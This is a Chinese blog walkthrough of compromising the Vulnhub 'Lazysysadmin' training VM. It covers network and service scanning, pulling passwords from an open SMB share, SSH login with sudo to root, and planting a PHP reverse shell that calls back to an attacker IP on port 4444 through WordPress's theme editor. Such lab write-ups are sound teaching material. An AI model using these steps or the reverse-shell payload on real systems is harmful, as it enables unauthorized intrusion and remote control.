青蛙爱轮滑
青蛙爱轮滑

OSCP - Lazysysadmin 的破解

本文主要记录对 Lazysysadmin 的渗透学习过程,测试的 VM 主机主要来源 www.vulnhub.com
博客集:面向 CTF 的 OSCP 破解系列
下载链接: Lazysysadmin

1. ip 探测

  1. ip 探测

    使用 netdiscover,由于在内网,可以直接扫网网段

     root@kali:~# netdiscover -r 10.10.10.0/24
  Currently scanning: Finished!   |   Screen View: Unique Hosts                            
 																						  
  5 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 300                          
  _____________________________________________________________________________
    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
  -----------------------------------------------------------------------------
  10.10.10.1      00:50:56:c0:00:08      2     120  VMware, Inc.                           
  10.10.10.2      00:50:56:e5:a6:4e      1      60  VMware, Inc.                           
  10.10.10.133    00:0c:29:9e:53:39      1      60  VMware, Inc.                           
  10.10.10.254    00:50:56:ea:fa:42      1      60  VMware, Inc.

    发现 ip 地址为 10.10.10.133

  2. 端口扫描

    使用 masscan ,可以进行限速

     root@kali:~# masscan 10.10.10.133 -p1-1000 --rate=10000
 
 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2018-08-16 13:16:13 GMT
  -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
 Initiating SYN Stealth Scan
 Scanning 1 hosts [1000 ports/host]
 Discovered open port 22/tcp on 10.10.10.133                                    
 Discovered open port 80/tcp on 10.10.10.133                                    
 Discovered open port 139/tcp on 10.10.10.133                                   
 Discovered open port 445/tcp on 10.10.10.133

  3. 扫描端口和服务

    使用 nmap 扫描

     root@kali:~# nmap -T4 -A -v 10.10.10.133 -p0-10000
 Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-16 09:18 EDT
 NSE: Loaded 148 scripts for scanning.
 NSE: Script Pre-scanning.
 Initiating NSE at 09:18
 Completed NSE at 09:18, 0.00s elapsed
 Initiating NSE at 09:18
 Completed NSE at 09:18, 0.00s elapsed
 Initiating ARP Ping Scan at 09:18
 Scanning 10.10.10.133 [1 port]
 Completed ARP Ping Scan at 09:18, 0.04s elapsed (1 total hosts)
 Initiating Parallel DNS resolution of 1 host. at 09:18
 Completed Parallel DNS resolution of 1 host. at 09:18, 0.02s elapsed
 Initiating SYN Stealth Scan at 09:18
 Scanning 10.10.10.133 (10.10.10.133) [10001 ports]
 Discovered open port 3306/tcp on 10.10.10.133
 Discovered open port 22/tcp on 10.10.10.133
 Discovered open port 139/tcp on 10.10.10.133
 Discovered open port 445/tcp on 10.10.10.133
 Discovered open port 80/tcp on 10.10.10.133
 Discovered open port 6667/tcp on 10.10.10.133
 Completed SYN Stealth Scan at 09:18, 1.41s elapsed (10001 total ports)
 Initiating Service scan at 09:18
 Scanning 6 services on 10.10.10.133 (10.10.10.133)
 Completed Service scan at 09:19, 11.03s elapsed (6 services on 1 host)
 Initiating OS detection (try #1) against 10.10.10.133 (10.10.10.133)
 NSE: Script scanning 10.10.10.133.
 Initiating NSE at 09:19
 Completed NSE at 09:19, 10.27s elapsed
 Initiating NSE at 09:19
 Completed NSE at 09:19, 0.01s elapsed
 Nmap scan report for 10.10.10.133 (10.10.10.133)
 Host is up (0.00088s latency).
 Not shown: 9995 closed ports
 PORT     STATE SERVICE     VERSION
 22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
 |   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
 |   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
 |_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
 80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
 |_http-generator: Silex v2.2.7
 | http-methods: 
 |_  Supported Methods: OPTIONS GET HEAD POST
 | http-robots.txt: 4 disallowed entries 
 |_/old/ /test/ /TR2/ /Backnode_files/
 |_http-server-header: Apache/2.4.7 (Ubuntu)
 |_http-title: Backnode
 139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
 3306/tcp open  mysql       MySQL (unauthorized)
 6667/tcp open  irc         InspIRCd
 | irc-info: 
 |   server: Admin.local
 |   users: 1
 |   servers: 1
 |   chans: 0
 |   lusers: 1
 |   lservers: 0
 |   source ident: nmap
 |   source host: 10.10.10.128
 |_  error: Closing link: ([email protected]) [Client exited]
 MAC Address: 00:0C:29:9E:53:39 (VMware)
 Device type: general purpose
 Running: Linux 3.X|4.X
 OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
 OS details: Linux 3.2 - 4.9
 Uptime guess: 0.008 days (since Thu Aug 16 09:07:34 2018)
 Network Distance: 1 hop
 TCP Sequence Prediction: Difficulty=259 (Good luck!)
 IP ID Sequence Generation: All zeros
 Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

 Host script results:
 |_clock-skew: mean: -3h20m00s, deviation: 5h46m24s, median: 0s
 | nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC:  (unknown)
 | Names:
 |   LAZYSYSADMIN<00>     Flags: 
 |   LAZYSYSADMIN<03>     Flags: 
 |   LAZYSYSADMIN<20>     Flags: 
 |   WORKGROUP<00>        Flags: 
 |_  WORKGROUP<1e>        Flags: 
 | smb-os-discovery: 
 |   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
 |   Computer name: lazysysadmin
 |   NetBIOS computer name: LAZYSYSADMIN\x00
 |   Domain name: \x00
 |   FQDN: lazysysadmin
 |_  System time: 2018-08-16T23:19:03+10:00
 | smb-security-mode: 
 |   account_used: guest
 |   authentication_level: user
 |   challenge_response: supported
 |_  message_signing: disabled (dangerous, but default)
 | smb2-security-mode: 
 |   2.02: 
 |_    Message signing enabled but not required
 | smb2-time: 
 |   date: 2018-08-16 09:19:03
 |_  start_date: N/A

 TRACEROUTE
 HOP RTT     ADDRESS
 1   0.88 ms 10.10.10.133 (10.10.10.133)

 NSE: Script Post-scanning.
 Initiating NSE at 09:19
 Completed NSE at 09:19, 0.00s elapsed
 Initiating NSE at 09:19
 Completed NSE at 09:19, 0.00s elapsed
 Read data files from: /usr/bin/../share/nmap
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 28.49 seconds
 		   Raw packets sent: 10024 (441.850KB) | Rcvd: 10017 (401.394KB)

  4. 爆破目录

    使用 dirb 爆破目录

     root@kali:~# dirb http://10.10.10.133 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o Desktop/result.txt

  5. 获取服务器的 banner 信息

     root@kali:~# curl -I 10.10.10.133
 HTTP/1.1 200 OK
 Date: Thu, 16 Aug 2018 13:29:36 GMT
 Server: Apache/2.4.7 (Ubuntu)
 Last-Modified: Sun, 06 Aug 2017 05:02:15 GMT
 ETag: "8ce8-5560ea23d23c0"
 Accept-Ranges: bytes
 Content-Length: 36072
 Vary: Accept-Encoding
 Content-Type: text/html

  6. 使用 wpscan 扫描

     root@kali:~# wpscan -u http://10.10.10.133/wordpress --force

  7. 使用 enum4linux 扫描

     root@kali:~# enum4linux 10.10.10.133

  8. 获取共享资源

    win 下

     net user k" \\10.10.10.133\share

    linux 下

     root@kali:~# mount -t cifs -o username='',password='' //10.10.10.133/share$ /mnt
 root@kali:~# cd /mnt/

    发现了两个重要文件 deets.txt 和 wp-config.php

     root@kali:/mnt# cat deets.txt 
 	CBF Remembering all these passwords.
 	Remember to remove this file and update your password after we push out the server.
 	Password 12345
 root@kali:/mnt/wordpress# cat wp-config.php 
 	// ** MySQL settings - You can get this info from your web host ** //
 	/** The name of the database for WordPress */
 	define('DB_NAME', 'wordpress');

 	/** MySQL database username */
 	define('DB_USER', 'Admin');

 	/** MySQL database password */
 	define('DB_PASSWORD', 'TogieMYSQL12345^^');

 	/** MySQL hostname */
 	define('DB_HOST', 'localhost');

 	/** Database Charset to use in creating database tables. */
 	define('DB_CHARSET', 'utf8');

 	/** The Database Collate type. Don't change this if in doubt. */
 	define('DB_COLLATE', '');

    上述发现敏感文件,密码为 12345,mysql 用户名和密码为 Admin:TogieMYSQL12345^^

  9. 登录 ssh

    登录 phpmyadmin
    访问 wordpress 页面发现提示用户名为 togie,使用 ssh 登录

     ssh [email protected]

    登录成功

     togie@LazySysAdmin:~$ whoami
 togie
 togie@LazySysAdmin:~$ id
 uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
 togie@LazySysAdmin:~$ sudo su
 [sudo] password for togie: 
 root@LazySysAdmin:/home/togie#

    查看 flag

     root@LazySysAdmin:~# cat proof.txt

  10. 登录 wordpress

    在管理页面的 Apperance -> Editor ,修改 404 页面的模板

    添加内容:

    set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.10.128';
$port = '4444';
$CHUNK_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a;w;id;/bin/sh -i';
$darmon = 0;
$debug = 0;

    kali 设置反弹,获取到初始的 shell 环境

    或者修改为一句话木马,使用菜刀连接

    http://10.10.10.133/wordpress/wp-content/themes/twentyfifteen/404.php
    提示 no tty present and no asdpass program spacified

    可以使用 python -c ‘import pty; pty.spawn("/bin/sh")’,将初始的 shell 切换为 bash shell 环境

你可能感兴趣的:(OSCP-CTF)

  • JAVA中的Enum 周凡杨 javaenum枚举
    Enum是计算机编程语言中的一种数据类型---枚举类型。 在实际问题中,有些变量的取值被限定在一个有限的范围内。     例如,一个星期内只有七天 我们通常这样实现上面的定义: public String monday; public String tuesday; public String wensday; public String thursday
  • 赶集网mysql开发36条军规 Bill_chen mysql业务架构设计mysql调优mysql性能优化
    (一)核心军规 (1)不在数据库做运算    cpu计算务必移至业务层; (2)控制单表数据量    int型不超过1000w,含char则不超过500w;    合理分表;    限制单库表数量在300以内; (3)控制列数量    字段少而精,字段数建议在20以内
  • Shell test命令 daizj shell字符串test数字文件比较
    Shell test命令 Shell中的 test 命令用于检查某个条件是否成立,它可以进行数值、字符和文件三个方面的测试。 数值测试 参数 说明 -eq 等于则为真 -ne 不等于则为真 -gt 大于则为真 -ge 大于等于则为真 -lt 小于则为真 -le 小于等于则为真 实例演示: num1=100 num2=100if test $[num1]
  • XFire框架实现WebService(二) 周凡杨 javawebservice
       有了XFire框架实现WebService(一),就可以继续开发WebService的简单应用。 Webservice的服务端(WEB工程): 两个java bean类: Course.java    package cn.com.bean; public class Course {     private
  • 重绘之画图板 朱辉辉33 画图板
           上次博客讲的五子棋重绘比较简单,因为只要在重写系统重绘方法paint()时加入棋盘和棋子的绘制。这次我想说说画图板的重绘。        画图板重绘难在需要重绘的类型很多,比如说里面有矩形,园,直线之类的,所以我们要想办法将里面的图形加入一个队列中,这样在重绘时就
  • Java的IO流 西蜀石兰 java
    刚学Java的IO流时,被各种inputStream流弄的很迷糊,看老罗视频时说想象成插在文件上的一根管道,当初听时觉得自己很明白,可到自己用时,有不知道怎么代码了。。。 每当遇到这种问题时,我习惯性的从头开始理逻辑,会问自己一些很简单的问题,把这些简单的问题想明白了,再看代码时才不会迷糊。 IO流作用是什么? 答:实现对文件的读写,这里的文件是广义的; Java如何实现程序到文件
  • No matching PlatformTransactionManager bean found for qualifier 'add' - neither 林鹤霄
    java.lang.IllegalStateException: No matching PlatformTransactionManager bean found for qualifier 'add' - neither qualifier match nor bean name match!   网上找了好多的资料没能解决,后来发现:项目中使用的是xml配置的方式配置事务,但是
  • Row size too large (> 8126). Changing some columns to TEXT or BLOB aigo column
    原文:http://stackoverflow.com/questions/15585602/change-limit-for-mysql-row-size-too-large   异常信息: Row size too large (> 8126). Changing some columns to TEXT or BLOB or using ROW_FORMAT=DYNAM
  • JS 格式化时间 alxw4616 JavaScript
    /** * 格式化时间 2013/6/13 by 半仙 [email protected] * 需要 pad 函数 * 接收可用的时间值. * 返回替换时间占位符后的字符串 * * 时间占位符:年 Y 月 M 日 D 小时 h 分 m 秒 s 重复次数表示占位数 * 如 YYYY 4占4位 YY 占2位<p></p> * MM DD hh mm
  • 队列中数据的移除问题 百合不是茶 队列移除
         队列的移除一般都是使用的remov();都可以移除的,但是在昨天做线程移除的时候出现了点问题,没有将遍历出来的全部移除,  代码如下;      // package com.Thread0715.com; import java.util.ArrayList; public class Threa
  • Runnable接口使用实例 bijian1013 javathreadRunnablejava多线程
    Runnable接口 a.       该接口只有一个方法:public void run(); b.       实现该接口的类必须覆盖该run方法 c.       实现了Runnable接口的类并不具有任何天
  • oracle里的extend详解 bijian1013 oracle数据库extend
    扩展已知的数组空间,例: DECLARE TYPE CourseList IS TABLE OF VARCHAR2(10); courses CourseList; BEGIN -- 初始化数组元素,大小为3 courses := CourseList('Biol 4412 ', 'Psyc 3112 ', 'Anth 3001 '); --
  • 【httpclient】httpclient发送表单POST请求 bit1129 httpclient
    浏览器Form Post请求 浏览器可以通过提交表单的方式向服务器发起POST请求,这种形式的POST请求不同于一般的POST请求 1. 一般的POST请求,将请求数据放置于请求体中,服务器端以二进制流的方式读取数据,HttpServletRequest.getInputStream()。这种方式的请求可以处理任意数据形式的POST请求,比如请求数据是字符串或者是二进制数据 2. Form
  • 【Hive十三】Hive读写Avro格式的数据 bit1129 hive
     1. 原始数据 hive> select * from word; OK 1 MSN 10 QQ 100 Gtalk 1000 Skype      2. 创建avro格式的数据表   hive> CREATE TABLE avro_table(age INT, name STRING)STORE
  • nginx+lua+redis自动识别封解禁频繁访问IP ronin47
    在站点遇到攻击且无明显攻击特征,造成站点访问慢,nginx不断返回502等错误时,可利用nginx+lua+redis实现在指定的时间段 内,若单IP的请求量达到指定的数量后对该IP进行封禁,nginx返回403禁止访问。利用redis的expire命令设置封禁IP的过期时间达到在 指定的封禁时间后实行自动解封的目的。 一、安装环境: CentOS x64 release 6.4(Fin
  • java-二叉树的遍历-先序、中序、后序(递归和非递归)、层次遍历 bylijinnan java
    import java.util.LinkedList; import java.util.List; import java.util.Stack; public class BinTreeTraverse { //private int[] array={ 1, 2, 3, 4, 5, 6, 7, 8, 9 }; private int[] array={ 10,6,
  • Spring源码学习-XML 配置方式的IoC容器启动过程分析 bylijinnan javaspringIOC
    以FileSystemXmlApplicationContext为例,把Spring IoC容器的初始化流程走一遍: ApplicationContext context = new FileSystemXmlApplicationContext ("C:/Users/ZARA/workspace/HelloSpring/src/Beans.xml&q
  • [科研与项目]民营企业请慎重参与军事科技工程 comsci 企业
         军事科研工程和项目 并非要用最先进,最时髦的技术,而是要做到“万无一失”    而民营科技企业在搞科技创新工程的时候,往往考虑的是技术的先进性,而对先进技术带来的风险考虑得不够,在今天提倡军民融合发展的大环境下,这种“万无一失”和“时髦性”的矛盾会日益凸显。。。。。。所以请大家在参与任何重大的军事和政府项目之前,对
  • spring 定时器-两种方式 cuityang springquartz定时器
    方式一: 间隔一定时间 运行 <bean id="updateSessionIdTask" class="com.yang.iprms.common.UpdateSessionTask" autowire="byName" /> <bean id="updateSessionIdSchedule
  • 简述一下关于BroadView站点的相关设计 damoqiongqiu view
    终于弄上线了,累趴,戳这里http://www.broadview.com.cn   简述一下相关的技术点   前端:jQuery+BootStrap3.2+HandleBars,全站Ajax(貌似对SEO的影响很大啊!怎么破?),用Grunt对全部JS做了压缩处理,对部分JS和CSS做了合并(模块间存在很多依赖,全部合并比较繁琐,待完善)。   后端:U
  • 运维 PHP问题汇总 dcj3sjt126com windows2003
    1、Dede(织梦)发表文章时,内容自动添加关键字显示空白页 解决方法: 后台>系统>系统基本参数>核心设置>关键字替换(是/否),这里选择“是”。 后台>系统>系统基本参数>其他选项>自动提取关键字,这里选择“是”。   2、解决PHP168超级管理员上传图片提示你的空间不足 网站是用PHP168做的,反映使用管理员在后台无法
  • mac 下 安装php扩展 - mcrypt dcj3sjt126com PHP
    MCrypt是一个功能强大的加密算法扩展库,它包括有22种算法,phpMyAdmin依赖这个PHP扩展,具体如下: 下载并解压libmcrypt-2.5.8.tar.gz。 在终端执行如下命令: tar zxvf libmcrypt-2.5.8.tar.gz cd libmcrypt-2.5.8/ ./configure --disable-posix-threads --
  • MongoDB更新文档 [四] eksliang mongodbMongodb更新文档
    MongoDB更新文档 转载请出自出处:http://eksliang.iteye.com/blog/2174104 MongoDB对文档的CURD,前面的博客简单介绍了,但是对文档更新篇幅比较大,所以这里单独拿出来。 语法结构如下: db.collection.update( criteria, objNew, upsert, multi) 参数含义 参数   
  • Linux下的解压,移除,复制,查看tomcat命令 y806839048 tomcat
    重复myeclipse生成webservice有问题删除以前的,干净 1、先切换到:cd usr/local/tomcat5/logs 2、tail -f catalina.out 3、这样运行时就可以实时查看运行日志了 Ctrl+c 是退出tail命令。 有问题不明的先注掉   cp /opt/tomcat-6.0.44/webapps/g
  • Spring之使用事务缘由(3-XML实现) ihuning spring
      用事务通知声明式地管理事务   事务管理是一种横切关注点。为了在 Spring 2.x 中启用声明式事务管理,可以通过 tx Schema 中定义的 <tx:advice> 元素声明事务通知,为此必须事先将这个 Schema 定义添加到 <beans> 根元素中去。声明了事务通知后,就需要将它与切入点关联起来。由于事务通知是在 <aop:
  • GCD使用经验与技巧浅谈 啸笑天 GC
    前言 GCD(Grand Central Dispatch)可以说是Mac、iOS开发中的一大“利器”,本文就总结一些有关使用GCD的经验与技巧。 dispatch_once_t必须是全局或static变量 这一条算是“老生常谈”了,但我认为还是有必要强调一次,毕竟非全局或非static的dispatch_once_t变量在使用时会导致非常不好排查的bug,正确的如下: 1
  • linux(Ubuntu)下常用命令备忘录1 macroli linux工作ubuntu
    在使用下面的命令是可以通过--help来获取更多的信息1,查询当前目录文件列表:ls ls命令默认状态下将按首字母升序列出你当前文件夹下面的所有内容,但这样直接运行所得到的信息也是比较少的,通常它可以结合以下这些参数运行以查询更多的信息:  ls / 显示/.下的所有文件和目录  ls -l 给出文件或者文件夹的详细信息 ls -a 显示所有文件,包括隐藏文
  • nodejs同步操作mysql qiaolevip 学习永无止境每天进步一点点mysqlnodejs
    // db-util.js var mysql = require('mysql'); var pool = mysql.createPool({ connectionLimit : 10, host: 'localhost', user: 'root', password: '', database: 'test', port: 3306 });
  • 一起学Hive系列文章 superlxw1234 hiveHive入门
      [一起学Hive]系列文章 目录贴,入门Hive,持续更新中。   [一起学Hive]之一—Hive概述,Hive是什么 [一起学Hive]之二—Hive函数大全-完整版 [一起学Hive]之三—Hive中的数据库(Database)和表(Table) [一起学Hive]之四-Hive的安装配置 [一起学Hive]之五-Hive的视图和分区 [一起学Hive
  • Spring开发利器:Spring Tool Suite 3.7.0 发布 wiselyman spring
    Spring Tool Suite(简称STS)是基于Eclipse,专门针对Spring开发者提供大量的便捷功能的优秀开发工具。   在3.7.0版本主要做了如下的更新:   将eclipse版本更新至Eclipse Mars 4.5 GA Spring Boot(JavaEE开发的颠覆者集大成者,推荐大家学习)的配置语言YAML编辑器的支持(包含自动提示,
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他